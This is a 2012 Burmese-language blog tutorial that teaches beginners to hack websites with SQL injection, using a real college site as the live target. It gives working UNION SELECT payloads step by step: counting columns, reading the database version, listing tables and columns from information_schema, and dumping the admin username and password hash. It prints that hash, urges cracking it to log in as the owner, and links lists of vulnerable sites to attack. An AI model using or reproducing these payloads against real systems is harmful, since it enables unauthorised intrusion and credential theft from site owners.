Tuesday, December 25, 2012

SQL injection For Beginner(MHU)

slq injection ဆိုတာ website တွေကို ဟက်ဖို့  နည်းတစ်ခုပါ…. ဖွင့်ဆိုချက်က ဘာလည်း ဘာညာတော့ မသိလည်း ဖြစ်ပါတယ်…. အေးဆေးပေါ့ လက်တွေ့ ကိုပဲ တူတူ ရွီးကြတာပေါ့…. ဆိုက်တွေက အကြောင်း အမျိုးမျိုးကြောင့် ဟာကွက်လေးတွေ ချို့ ယွင်းချက်လေးတွေ ဖြစ်လာပါတယ်…. အဲဒီ ဟာကွက်တွေကို အခွင့်ကောင်းယူပြီး အဲဆိုက် ပိုင်ရှင်ရဲ့ နာမည်နဲ့  password ကို ရအောင်ယူပြီး လုပ်ချင်ရာလုပ်ကြမယ်ဆိုပါတော့ …. ပထမဆုံး slq injection နဲ့  လုပ်လို့  ရမယ့် ဟာကွက် ရှိတဲ့ ဆိုက်ကို ရှာပါမယ်…. ရှာနည်းကတော့ ဘာမှ ခက်တာကို မပါတာပါ…. အောက်ဆုံးမှာ ညွန်းထားပါတယ် အဆင်ပြေမှာပါ…. ဒါကတော့ လုပ်ရုံ သက်သက်ပါပဲ…. တွေ့ ပြီပဲဆိုပါတော့

Code:
http://www.cvs.ac.in/news.php?page=news2'&id=1
အဲဒီမှာ ဟာကွက်ရှိပါတယ်…. သေချာအောင် ထပ်စမ်းပါမယ် 1 အနောက်မှာ ( ) လေးကပ်ထည့်ကြည့်ပါ…. ဟာကွက် ရှိတယ် ဆိုရင် error ဖြစ်နေပါလိမ့်မယ်…. အခု ပစ်မှတ်ကို ထည့်လို်က်တာ အောက်ကလို အယ်ရာ ဖြစ်နေပါတယ်….
Code:
http://www.cvs.ac.in/news.php?page=news2'&id=1'
Click this bar to view the original image of 1012x569px.


ဒါဆို ဟာကွက် ရှိပြီပေါ့….ကောင်မလေးက ပြန်ချစ်သလို ပျော်ပေအုန်းတော့ ဟေ…့ ခစ်ခစ် တစ်ဝက်ပဲ ပျော်…. ဟို လစ်တယ် ဆိုတဲ့ ကလေးလေးလို မိဘသဘောမတူရင် ထိုင်ငိုနေရမယ်…. နောက်တစ်ခု ဆက်လုပ်ပါမယ်…. အဲဝက်ဆိုက်မှာ ကော်လံ ဘယ်နှစ်ခု ရှိလည်း စစ်ရပါမယ်…. 1 အနောက်မှာ စပေ့လေး ခြားပြီး order by 1-- လို့ ရိုက်ဖွင့်ကြည့်ပါ သူ့ ပုံမှန်ပွင့်နေကျ အတိုင်း ၀က်ဆိုက်ကြီးက ပွင့်လာပါမယ် ဒါဆို ကော်လံ တစ်ခု မဟုတ်ပါဘူး order by 2-- လို့  လုပ်ကြည့်ပါ ပုံမှန်အတိုင်းပွင့်ရင် ကော်လံ နှစ်ခု မဟုတ်ပါဘူး အဲလို တစ်ခု တစ်ခု တိုးတိုးပြီး လုပ်ကြည့်သွားပါ အယ်ရာ တက်လာတဲ့ ဂဏန်းကျရင် ရပ်ထားလိုက်ပါ ပြီးရင် အဲဂဏန်းကို တစ်လျော့လိုက်ပါ ရလာတဲ့ အရေအတွက်က ကော်လံအရေအတွက်ပါပဲ ဥပမာပြပါ့မယ် အခု ကျွန်တော်တို့  1 ကနေ တိုးပြီး လုပ်လာတာ 6 မှာ အယ်ရာ တက်ပါတယ် ဒါဆို ကော်လံ 5 ခု ရှိပါတယ် အယ်ရာတက်တဲ့ ဂဏန်းကို တစ်ခုလျော့တာဟာ ရှိတဲ့ ကော်လံ အရေအတွက်ပါပဲ…. ပုံကို ကြည့်ပါ 6 အရောက်မှာ အယ်ရာ တက်နေပါတယ်
Code:
http://www.cvs.ac.in/news.php?page=news2'&id=1 order by 6--


ကော်လံ 5 ခုရှိပါတယ်…. ကော်လံ ဘယ်နှစ်ခု ရှိလည်း စစ်တာကို ရှင်းပြီ ထင်ပါတယ်…. နောက်တစ်ဆင့်က ဘယ်ကော်လံကနေ အချက်အလက်တွေ ယူလို့  ရလည်းလို့  စမ်းပါမယ် union all select နဲ့  ကော်လံ အရေအတွက်ကို တွဲပေးလိုက်ရင် ရပါပြီ ဒီလိုဖြစ်သွားတာပေါ့ ဖွင့်ကြည့်လိုက်ပါ အောက်က ပုံလို ဖြစ်သွားပါမယ်….
Code:
http://www.cvs.ac.in/news.php?page=news2'&id=-1 union all select 1,2,3,4,5--


ပုံမှာ 2 နဲ့ 3 ပေါ်နေပါတယ် ဒါဆို ၀င်လို့  ရတဲ့ ကော်လံက ကော်လံ 2 နဲ့  ကော်လံ 3 ပေါ့ သူတို့ ကို သုံးပြီး ၀င်ပါမယ် ၀င်တဲ့နေရာမှာ ကြိုက်တဲ့ ကော်လံက ၀င်နိုင်ပါတယ်…. 2က ၀င်ဝင် 3 က ၀င်ဝင်ပါ…. အပေါ်ကပုံကို သေချာ ကြည့်ပါ ၀က်ဆိုက်လိပ်စာမှာ 1အရှေ့မှာ - လေးထည့်ပြီး -1လို့ ရေးထားပါတယ်…. အဲလို ထည့်မှ ကော်လံပေါ်မှာပါ…. နောက်တစ်ဆင့်က အချက်အလက်တွေ သိမ်းထားတဲ့(database)က version ဘယ်လောက်လည်းလို့  စစ်ရပါမယ်…. စစ်နည်းကတော့ ၀င်လို့  ရတဲ့ ကော်လံ နေရာမှာ @@version ကို အစားထိုး ရုံပါပဲ…. ဒီလိုဖြစ်သွားပါမယ်….
Code:
http://www.cvs.ac.in/news.php?page=news2'&id=-1 union all select 1,@@version,3,4,5--
ဒါဆို သုံးနေတဲ့ ဗားရှင်းပေါ်လာပါမယ် ပုံမှာကြည့်ပါ



5.0.77 ဆိုတာလေး မြင်မှာပါ ဒါဆို ဗားရှင်း သိပါပြီ ဗားရှင်းကို နှစ်မျိုးပဲ ခွဲပါမယ်…. ဗားရှင်း 4 နဲ့ 5 ဆိုပြီးတော့ပါ …. ဘာလို့  ဗားရှင်းကို သိအောင် လုပ်လည်းဆိုတော့ ဗားရှင်း 4 အတွက်က လုပ်နည်း တစ်ခု 5 အတွက်က လုပ်နည်း တစ်ခုမို့ ပါ…. ဗားရှင်း 4, 5 ခွဲတာကို ကွဲပြားအောင် ပြောပါ့မယ် 5 နဲ့  ငါးထက်ကြီးရင် ဗားရှင်း 5 သုံးတာပါ…. အခုက 5 ထက်ကြီးလို့  5 သုံးတယ်လို့  သိပါပြီ…. ၀က်ဆိုက်တွေက အချက်အလက်တွေကို table တွေထဲသိမ်းထားပါတယ် ဒီတော့ ဒီဝက်ဆိုက်မှာ တေဘယ် ဘယ်နှစ်ခု ရှိတယ် ဆိုတာ စစ်ပါ့မယ်…. ဗားရှင်း စစ်သလိုပါပဲ ဟာကွက် ရှိတဲ့ ကော်လံမှာ group_concat(table_name) ကိုထည့် နောက်ဆုံးမှာ from information_schema.tables where table_schema=database()-- ကိုထည့်လိုက်ရင် ရပါပြီ ဒီလိုလေးဖြစ်သွားတာပေါ့
Code:
http://www.cvs.ac.in/news.php?page=news2'&id=-1 union all select 1,group_concat(table_name),3,4 ,5 from information_schema.tables where table_schema=database()--
ဖွင့်ကြည့်လိုက်ပါ အောက်က ပုံလေး ပေါ်လာပါမယ်….

Click this bar to view the original image of 1012x569px.


Article, arcitle_category_mapping စသဖြင့် အများကြီး ပေါ်လာပါပြီ အဲဒီ တေဘယ်တွေ ထဲကမှ ၀က်ဆိုက်ကို ၀င်ခွင့်ရမယ့် admin name နဲ့  password ရှိတဲ့ တေဘယ်ကို ရှာပြီး admin password ယူရပါမယ်…. တစ်ခါတစ်လေ ကိုယ်က password ရှိမယ်ထင်ပြီး ရှာတဲ့ တေဘယ်က မရှိတတ်ပါဘူး…. ဒါဆို နောက် တေဘယ် တစ်ခုကို ကြိုးစား ရပါမယ်…. ကျွန်တော်တို့  တေဘယ်တွေ လိုက်ကြည့်ရင်း tbl_adminsignup ဆိုတာ တွေ့ ပါပြီ adminsignup ဆိုတာကြီးက နည်းနည်း ရင်ခုန်ဖို့  ကောင်းပါတယ်…. ဒီတော့ အဲတေဘယ်ထဲမှာ ဘာတွေ ရှိလည်း ကြည့်ပါတော့မယ် မကြည့်ခင် တေဘယ်တွေ ဘယ်လို တည်ဆောက်ထားလည်း အရင် ဆွေးနွေး ကြည့်ရအောင်…. တေဘယ် တစ်ခုကို row တွေ columnတွေနဲ့  တည်ဆောက်ပါတယ်…. ဒီလိုပေါ့

နာမည် ပက်စဝေါ့ မွေးနေ့ 
ဝတ်မှုန်ရွေရည် booterlove 13.2.1985
နန်းခင်ဇေယျာ lovingbooter 24.5.1995
မိုးယုစံ booterwife 21.21.1991

အဲဒီမှာ row(အလျားလိုက်) လေးခု နဲ့  column(ဒေါင်လိုက်) သုံးခုပါပါတယ်…. ဒါက တေဘယ် တစ်ခုပါပဲ…. အခု ကျွန်တော်တို့  ကြည့်ချင်တဲ့ တေဘယ်မှာ ဘာတွေပါလည်းလို့  column တွေခေါ်ကြည့်ပါမယ်…. ကြည့်နည်းက ဒီလိုလေးပါ
Code:
http://www.cvs.ac.in/news.php?page=news2'&id=-1 union all select 1,column_name,2,3,4,5 from information_schema.columns where table_name=’tbl_adminsignup’--
ဖွင့်ကြည့်ပါမယ်….

Click this bar to view the original image of 1012x569px.


တွေ့ ပါပြီ column တွေ strname, strusername, strpassword, strdob, intid တို့ ပါ အဲ column တွေ ထဲမှာ ရင်ကို အထိရှ စေဆုံးက strusername, strpassword ပါပဲ ဒီ columnတွေထဲမှာ admin password ရှိမယ်လို့  ထင်ပါတယ်…. စမ်းကြည့်ရအောင် သုံးရမှာက ဒီလိုလေးပါ….
Code:
http://www.cvs.ac.in/news.php?page=news2'&id=-1 union all select 1,concat(strusername,0x3a,strpassword),3,4,5 from tbl_adminsignup--
ဖွင့်ကြည့်ပါမယ်….

Click this bar to view the original image of 1012x569px.


strusername ဆိုတဲ့ column ရယ် strpassword ဆိုတဲ့ column ရယ် ဒီနှစ်ခု အောက်မှာ ရှိတာတွေကို ပြပါပြီ.... အဟမ်း အဟမ်း ဒီလို ဆိုရင်ဖြင့် လိုချင်တဲ့ ၀က်ဆိုက်ရဲ့ admin password ပေါ်လာပါပြီ(ဆိုက်တိုင်းလိုလိုမှာ admin နာမည်က admin ပါပဲ ) …. အခု လိုချင်တာ ရပါပြီ….
Admin:*01A6717BS8FFSC7EAFF6CB7C96F7428EA6SFE4C
ဆိုပြီးတော့ပါ username ကadmin.. password က *01A6717BS8FFSC7EAFF6CB7C96F7428EA6SFE4C ပါ ကျွန်တော် ခုနသုံးလိုက်တဲ့ ဟာလေးကို ပြန်ရှင်းကြည့်ပါမယ်….
union all select 1,concat(strusername,0x3a,strpassword),3,4,5 from tbl_adminsignup
ဝင်လို့ ရတဲ့ ကော်လံမှာ strusername,0x3a,strpassword နဲ့  နောက်ဆုံးမှာ from tbl_adminsignup
လို့  ထည့်ထားပါတယ် ဆိုလိုတာက tbl_adminsignup ဆိုတဲ့ တေဘယ်ထဲမှာ ရှိတဲ့ strusername, strpassword ဆိုတဲ့ကော်လံအောက်မှာ ရှိတာကို ပြခိုင်းတာပါ(tbl_adminsignup နေရာမှာ တစ်ခြား table name တွေ အစားထိုး ကြည့်လို့  ရပါတယ် အဲလိုပဲ strusername strpassword တို့ နေရာမှာလည်း တစ်ခြား column name တွေ အစားထိုးလို့ ရပါတယ်....) အလယ်က 0x3a ဆိုတာ : လေးကို ၀က်ဆိုက်က နားလည်အောင် ရေးထားတာပါ…. ပုံကိုကြည့်ပါ ပထမ username လာတယ် ဒုတိယ : လာတယ် တတိယ password လာတယ် ကျွန်တော်တို့  ရေးလိုက်တဲ့ အစဉ်တိုင်း သူလာတာပါ 0x3a ကို မထည့်ရင် username နဲ့  password ကို ပူးပြီး ပြလာမှာပါ ဒါဆို ရှုပ်နေမှာပေါ့ ရှင်းသွားအောင် အလယ်မှာ အစက်လေး နှစ်စက်နဲ့  ခြားလိုက်တာပါ ဒီလောက်ဆို ရှင်းလောက်ပါပြီ ပြောစရာရှိသေးတာက password ပါ သူက ပက်စဝေါ့ အစစ် မဟုတ်သေးပါဘူးစကားလိမ်(hash) နဲ့ ရေးထားတဲ့ ပက်စဝေါ့ပါ စကားလိမ်ကို ဖြေပြီးမှ အစစ်ရမှာပါ ဒါဆို ဖြေရအုန်းမှာပေါ့ အင်တာနက်ထဲမှာ ဖြေပေးတဲ့ ၀က်ဆိုက်တွေ အများကြီး ရှိပါတယ် ဖြေပေးတဲ့ ဆော့ဝဲလ်တွေလည်း ရှိပါတယ် သုံးရုံပါပဲ ပက်စဝေါ့တွေကို စကားလိမ် လုပ်နည်းတွေ အများကြီး ရှိပါတယ် md5 ဆိုတဲ့လုပ်နည်း mysql5 ဆိုတဲ့ လုပ်နည်း စသဖြင့် လုပ်နည်း ပေါင်း များစွာ ရှိပါတယ် အဲလုပ်နည်းတွေကို အစ်ကို big boss ရေးထားတဲ့  ပို့ စ်မှာ သွားကြည့်ပါ အဲမှာ စာလုံး အရေအတွက် ဘယ်နှစ်လုံးပါရင် ဘာသင်္ကေတပါရင် ဘာနည်းနဲ့  စကားလိမ် လုပ်ထားတယ် ဆိုတာကို ဇယားလေး လုပ်ပေးထားပါတယ် ခုရလာတဲ့ ပက်စဝေါ့ကို တိုက်ကြည့်လိုက်တော့ mysql5 နဲ့  လုပ်ထားတယ် ဆိုတာ သိသွားပါပြီ ဒါဆို Mysql5 ဖြေပေးတဲ့ ၀က်ဆိုက် ဒါမှမဟုတ် ဆော့ဝဲလ်နဲ့ ဖြေယူ လိုက်ရုံပါပဲ ဒါဆို ၀က်ဆိုက်ထဲကို ပိုင်ရှင် အဖြစ်နဲ့  ၀င်လို့  ရပါပြီ အထဲမှာ ပတ်မွေနိုင်ပြီပေါ့ဗျာ….
ဒီစာအုပ်လေး ဖတ်ကြည့်ပါ စာတွေ အပြင် tutorial video လင့်ခ်တွေလည်း ပါတာမို့  စုံပါတယ်…. အဲမှာပဲ အယ်ရာ ဖြစ်တဲ့ ၀က်ဆိုက်တွေ ရှာနည်းပါပါတယ်…. ကျန်တဲ့ သိသင့်တာလေးတွေလည်း စုံစုံလင်လင် ပါပါတယ်…. အခု လုပ်ပြသွားတာက အခြေခံလောက် ပေါ့ ကျန်တာတွေ ဆက်ကြည့်ဖို့  လိုအပ်တာလောက်ပေါ့…. ဒါကြောင့် ဒီစာအုပ်ကို ဖတ်ပြီး ကျန်တာတွေ ဆက်ကြည့်တာပေါ့….

Code:
http://minus.com/lGpnplaCVItj2
Hash types(စကားလိမ် နမူနာတွေ)
Code:
http://mmhackforums.com/forum/showthread.php?142-Hash-types
online hash crackers(စကားလိမ် ဖြေတဲ့ ဆိုက်တွေ)
Code:
http://mmhackforums.com/forum/showthread.php?170-Online-Hash-Crackers
sql injection vuln sites(လေ့ကျင့်ဖို့  အယ်ရာဖြစ်နေတဲ့ ဆိုက်တွေ)
Code:
http://mmhackforums.com/forum/showthread.php?335-SQLi-vulnerable-site-list
လူချင်းတူပေမယ့် ပါရမီချင်း မတူပါဘူး ဆက်ချဲ့ ထွင်ပြီး လမ်းသစ်ဖောက်နိုင်ကြပါစေ…. အရှေ့က လူတွေကတော့ သွားလာလို့  ကောင်းအောင် လမ်းဖောက်ခဲ့ပါတယ်…. ကိုယ့်လက်ထက်မှာ ပိုကျယ်အောင် ချဲ့နိုင်ရင်ကောင်းတာပေါ့ ဟုတ်ဘူးလား…. အားမလျော့ပဲ တစ်ဆိုက် မရ တစ်ဆိုက် ပြောင်းပြီး လေ့ကျင့်ကြတာပေါ့…. မရတိုင်းလည်း ပြောင်းနဲ့ ပေါ့ဗျာ…. နည်းနည်းတော့ စဉ်းစားကြည့်အုန်း ဟီးဟီး…. ဒီလောက်ဆို အခြေခံလေး ရပြီထင်တာပဲ..........>>>>>><<<<<<<<

0 comments:

Post a Comment